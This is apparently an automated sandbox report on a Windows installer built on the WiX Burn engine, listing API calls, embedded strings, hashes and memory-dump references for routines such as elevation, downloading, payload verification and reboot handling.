                                                                                                                                                                                                                                                                            • String ID: AUState$CurrentRebootAttempts$PendingFileRenameOperations$PendingFileRenameOperations2$SOFTWARE\Microsoft\ServerManager$SOFTWARE\Microsoft\Updates$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending$SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update$SYSTEM\CurrentControlSet\Control\Session Manager$SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations$UpdateExeVolatile
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-3032311648
                                                                                                                                                                                                                                                                            • Opcode ID: 71fce2d85b96e8a7f09edbcb816b85735d5ff635a419692b11459ba95627865a
                                                                                                                                                                                                                                                                            • Instruction ID: 531f065880db1ffcf9c2be07a388f3ad1cb71c47ef415bea438dcd8d39da7c45
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71fce2d85b96e8a7f09edbcb816b85735d5ff635a419692b11459ba95627865a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0317571E4475DB7AB21E6724C46EAF7ABCEAC0B45F100556FE00F2142DA70EE48CB60
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(008E73DE,00000000,008E6CF2,2000000A,2000000A,?,0090B226,008E6CF2,?,008E73DE,00000001,008E73DE,008E73E2,008E6DA2,008E6CF2,00000000), ref: 00906979
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,008E6CF2,00000000,00000000), ref: 00906A82
                                                                                                                                                                                                                                                                              • Part of subcall function 00942587: ShellExecuteExW.SHELL32 ref: 00942603
                                                                                                                                                                                                                                                                              • Part of subcall function 00942587: GetLastError.KERNEL32 ref: 00942609
                                                                                                                                                                                                                                                                              • Part of subcall function 00942587: CloseHandle.KERNEL32(?), ref: 00942659
                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(00000000,0154B7FF,008E6CF2,runas,00000000,00000008,?,00000000,00000000,000000B0,?,?,008E6CF2,00000000,00000000), ref: 00906A62
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • -%ls=%ls, xrefs: 009069ED
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\elevation.cpp, xrefs: 009069C5, 00906A50
                                                                                                                                                                                                                                                                            • runas, xrefs: 00906A1F
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 00906A82
                                                                                                                                                                                                                                                                            • burn.elevated, xrefs: 0090699A
                                                                                                                                                                                                                                                                            • Failed to set log mode in elevated process command-line., xrefs: 00906A01
                                                                                                                                                                                                                                                                            • Failed to launch elevated child process: %ls, xrefs: 00906A3E
                                                                                                                                                                                                                                                                            • burn.log.mode, xrefs: 009069E5
                                                                                                                                                                                                                                                                            • Failed to allocate parameters for elevated process., xrefs: 009069B3
                                                                                                                                                                                                                                                                            • -q -%ls %ls %ls %u, xrefs: 0090699F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CurrentErrorExecuteLastShell
                                                                                                                                                                                                                                                                            • String ID: -%ls=%ls$-q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$Failed to set log mode in elevated process command-line.$burn.elevated$burn.log.mode$d:\a\wix4\wix4\src\burn\engine\elevation.cpp$runas$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 163010291-3239411051
                                                                                                                                                                                                                                                                            • Opcode ID: 167a84838eb86cf97cc7ed44224b16917b50e015a71516209603a7bf013df52b
                                                                                                                                                                                                                                                                            • Instruction ID: 0155d6affa78f9c4d16019a677f5e7a0b6f8bc6d93ebe7a1ddd32269338e237b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 167a84838eb86cf97cc7ed44224b16917b50e015a71516209603a7bf013df52b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE31F371E80319BFDB01EF90CC4AF9EBA78FF85714F004165FA18B6180D3B12A609B90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF), ref: 009098F9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to execute compatible MSI package.$Failed to find package: %ls$Failed to read MSI compatible package id.$Failed to read MSI package id.$Failed to read package log.$Failed to read parent hwnd.$Failed to read rollback flag.$Failed to read variables.$Package '%ls' has no compatible MSI package$Package '%ls' has no compatible package with id: %ls$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-1833463798
                                                                                                                                                                                                                                                                            • Opcode ID: 3c14ad897c9e05de15fc7b2e57b598a351350626f70480f11f20e5034cfc6f6c
                                                                                                                                                                                                                                                                            • Instruction ID: c493e7e6d49e19c8d93e5da468211d6d0740017a7ee56dbfa796e570711424dc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c14ad897c9e05de15fc7b2e57b598a351350626f70480f11f20e5034cfc6f6c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C71D672A40259BFDB21DED5CC4AFEF7A7CEB45B10F110116BA14BA1C2D6B09A40CBA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,?,0091E3CA,?), ref: 0094B63B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,?,0091E3CA,?,008E6DA2,00000000,?,008E6DA2,00000000), ref: 0094B656
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • application, xrefs: 0094B648
                                                                                                                                                                                                                                                                            • Failed to allocate default application type., xrefs: 0094B707
                                                                                                                                                                                                                                                                            • Failed to reallocate memory for update entries., xrefs: 0094B7C9
                                                                                                                                                                                                                                                                            • Failed to allocate memory for update entries., xrefs: 0094B6F9
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp, xrefs: 0094B6ED, 0094B721, 0094B7BD
                                                                                                                                                                                                                                                                            • type, xrefs: 0094B67D
                                                                                                                                                                                                                                                                            • Failed to process ATOM entry., xrefs: 0094B7DA
                                                                                                                                                                                                                                                                            • Failed to allocate default application id., xrefs: 0094B715
                                                                                                                                                                                                                                                                            • http://appsyndication.org/2006/appsyn, xrefs: 0094B62E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate default application id.$Failed to allocate default application type.$Failed to allocate memory for update entries.$Failed to process ATOM entry.$Failed to reallocate memory for update entries.$application$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00948654
                                                                                                                                                                                                                                                                              • Part of subcall function 0094666D: RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00946717
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 00948791
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 009487A0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$DeleteErrorFileHandleLast
                                                                                                                                                                                                                                                                            • String ID: Burn$DownloadTimeout$Failed to copy download source URL.$Failed to download URL: %ls$Failed to open internet session$Ignoring failure to get size and time for URL: %ls (error 0x%x)$WiX\Burn$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(0094E7C0,00000000,00000008,?,BundleExtensionData.xml,00000001,?,00000000,?), ref: 008F01D1
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,BundleExtensionCreate), ref: 008F01E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                            • String ID: ($BundleExtensionCreate$BundleExtensionData.xml$Failed to create BundleExtension '%ls'.$Failed to get BundleExtensionCreate entry-point '%ls'.$Failed to get BundleExtensionDataPath.$Failed to load BundleExtension DLL '%ls': '%ls'.$d:\a\wix4\wix4\src\burn\engine\burnextension.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00947D2E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00947D3B
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00947D92
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00947DC6
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp), ref: 00947E18
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                                                                                                                            • String ID: %ls.R$Failed to calculate resume path from working path: %ls$Failed to create resume file: %ls$Failed to create resume path.$Failed to read resume file: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 008FE331
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FE341
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008FE48D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                            • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$Payload has no verification information: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2528220319-660701767
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(SeShutdownPrivilege,?,00000000,00000001,A0000005,?,008E8015,?,?,?,?,?,?), ref: 008E6A39
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B884: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0093B8BC
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B884: GetLastError.KERNEL32 ref: 0093B8C6
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B884: CloseHandle.KERNEL32(00000000), ref: 0093B9DD
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,00000001,00000000,?,008E8015,?,?,?,?,?,?), ref: 008E6A8C
                                                                                                                                                                                                                                                                            • InitiateSystemShutdownExW.ADVAPI32(?,008E8015,?,?,?,?), ref: 008E6AAB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E8015,?,?,?,?,?,?), ref: 008E6AB1
                                                                                                                                                                                                                                                                              • Part of subcall function 009060F9: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,008E6A7F,?,00000001,00000000,?,008E8015,?,?,?,?,?,?), ref: 00906108
                                                                                                                                                                                                                                                                              • Part of subcall function 009060F9: LeaveCriticalSection.KERNEL32(?,?,008E6A7F,?,00000001,00000000,?,008E8015,?,?,?,?,?,?), ref: 00906129
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E6B21
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA,?,008E8015,?,?,?,?,?,?), ref: 008E6B3B
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA,?,008E8015,?,?,?,?,?,?), ref: 008E6B70
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E6B7C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Sleep$CriticalErrorLastSectionWindow$CloseCurrentEnterHandleInitiateLeaveLookupPrivilegeProcessShutdownSystemValue
                                                                                                                                                                                                                                                                            • String ID: Failed to enable shutdown privilege in process token.$Failed to schedule restart.$SeShutdownPrivilege$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2197606043-2157809017
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetProcessShutdownParameters.KERNEL32(000003FF,00000000,?,00000000,?,?,?,?,00000000,00000001), ref: 0090D74C
                                                                                                                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0090D757
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0090D764
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0090D370,?,00000000,00000000), ref: 0090D7CC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0090D7D9
                                                                                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF), ref: 0090D81F
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0090D838
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0090D849
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsParametersProcessShutdownThreadWait
                                                                                                                                                                                                                                                                            • String ID: Failed to create initialization event.$Failed to create the UI thread.$d:\a\wix4\wix4\src\burn\engine\uithread.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 665835008-3210454806
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,00000024,00000001,00000001,00000000,?,000000F8,00000001,00000000,000000F8,00000024,?,00000000,?), ref: 008EA317
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008EA61A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to parse variable value as version., xrefs: 008EA51F
                                                                                                                                                                                                                                                                            • Failed to read variable value as number., xrefs: 008EA580
                                                                                                                                                                                                                                                                            • Unsupported variable type., xrefs: 008EA54D
                                                                                                                                                                                                                                                                            • Failed to read variable name., xrefs: 008EA5E4
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA60A
                                                                                                                                                                                                                                                                            • Failed to read variable included flag., xrefs: 008EA5F8
                                                                                                                                                                                                                                                                            • Failed to read variable value as string., xrefs: 008EA536, 008EA5A8
                                                                                                                                                                                                                                                                            • Failed to set variable., xrefs: 008EA5BC
                                                                                                                                                                                                                                                                            • Failed to set variable value., xrefs: 008EA508, 008EA569, 008EA594
                                                                                                                                                                                                                                                                            • Failed to read variable value type., xrefs: 008EA5D0
                                                                                                                                                                                                                                                                            • Failed to read variable count., xrefs: 008EA337
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to parse variable value as version.$Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1722372363
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000), ref: 0093C811
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to concatenate paths while recursively deleting subkeys. Path1: %ls, Path2: %ls$Failed to delete registry key (ex).$Failed to delete registry key.$Failed to enumerate key 0$Failed to open this key for enumerating subkeys: %ls$Failed to recursively delete subkey: %ls$RegInitialize must be called first in order to RegDelete() a key with non-default bit attributes!$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-329788176
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,008E6DEA,00000000,C95B5EC6,00000000,00000000,00000000,54B7FF10,008E6DEA,00000001,00000001,008E6CF2,00000000,8D000001,008E6DEA), ref: 008F1472
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 008F144A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F132D, 008F13D2, 008F13D7, 008F13EF, 008F1436
                                                                                                                                                                                                                                                                            • Failed to open registry key. Key = '%ls', xrefs: 008F131B
                                                                                                                                                                                                                                                                            • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 008F13F8
                                                                                                                                                                                                                                                                            • Registry key not found. Key = '%ls', xrefs: 008F1346
                                                                                                                                                                                                                                                                            • Failed to format key string., xrefs: 008F12C5
                                                                                                                                                                                                                                                                            • Failed to query registry key value., xrefs: 008F13DD
                                                                                                                                                                                                                                                                            • Failed to set variable., xrefs: 008F1424
                                                                                                                                                                                                                                                                            • Failed to format value string., xrefs: 008F137B
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2242727714
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094A8B1
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094A8C0
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094A8CF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0094A763, 0094A76E, 0094A783, 0094A7CE
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown attribute name., xrefs: 0094A833
                                                                                                                                                                                                                                                                            • Failed to get unknown attribute value., xrefs: 0094A854
                                                                                                                                                                                                                                                                            • Failed to allocate unknown attribute., xrefs: 0094A774
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown attribute namespace., xrefs: 0094A7BF
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown attribute value., xrefs: 0094A87C
                                                                                                                                                                                                                                                                            • Failed to get unknown attribute namespace., xrefs: 0094A7E0
                                                                                                                                                                                                                                                                            • Failed to get unknown attribute name., xrefs: 0094A80E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate ATOM unknown attribute name.$Failed to allocate ATOM unknown attribute namespace.$Failed to allocate ATOM unknown attribute value.$Failed to allocate unknown attribute.$Failed to get unknown attribute name.$Failed to get unknown attribute namespace.$Failed to get unknown attribute value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2724874077-797782994
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemWindowsDirectoryW.KERNEL32(00000000,00000105), ref: 00942390
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00946531,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019), ref: 0094239C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to realloc Windows directory path., xrefs: 009423F2
                                                                                                                                                                                                                                                                            • Failed to terminate Windows directory path with backslash., xrefs: 0094249D
                                                                                                                                                                                                                                                                            • Failed to concat subdirectory on Windows directory path., xrefs: 00942477
                                                                                                                                                                                                                                                                            • Failed to get Windows directory path with returned size., xrefs: 00942444
                                                                                                                                                                                                                                                                            • Failed to alloc Windows directory path., xrefs: 0094236A
                                                                                                                                                                                                                                                                            • Failed to get Windows directory path with default size., xrefs: 009423CC
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 00942379, 009423C0, 009423C6, 009423D7, 00942439, 0094243E, 009424AC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
